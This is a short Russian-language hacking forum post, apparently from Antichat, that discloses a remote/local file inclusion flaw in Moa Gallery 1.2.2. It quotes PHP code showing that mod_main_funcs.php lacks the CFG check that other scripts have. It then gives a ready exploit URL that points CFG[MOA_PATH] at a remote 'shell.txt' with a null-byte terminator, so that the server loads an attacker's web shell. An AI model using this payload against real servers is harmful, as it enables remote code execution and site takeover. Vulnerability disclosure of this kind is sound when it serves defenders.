18.06.2010, 17:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Moa Gallery v1.2.2 (Updated 2010-06-17)
http://sourceforge.net/projects/moagallery/
В скриптах выставлена защита
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"CFG"[/COLOR][COLOR="#007700"]]))
{
echo[/COLOR][COLOR="#DD0000"]"Hacking attempt."[/COLOR][COLOR="#007700"];
die();
}
[/COLOR][/COLOR]
но в mod_main_funcs.php защита отсутствует
sources/mod_main_funcs.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// mod_gallery_funcs.php - This is a collection of functions that interect with the database and a gallery.
[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_error_funcs.php"[/COLOR][COLOR="#007700"]);
include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_db_funcs.php"[/COLOR][COLOR="#007700"]);
include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/mod_image_funcs.php"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
RFI or LFI
rg=on
http://localhost/Moa-1.2.2/sources/mod_main_funcs.php?CFG[MOA_PATH]=http://site.com/shell.txt%00
В версиях ниже 1.2.1 скрипт отсутствует.
|
|
|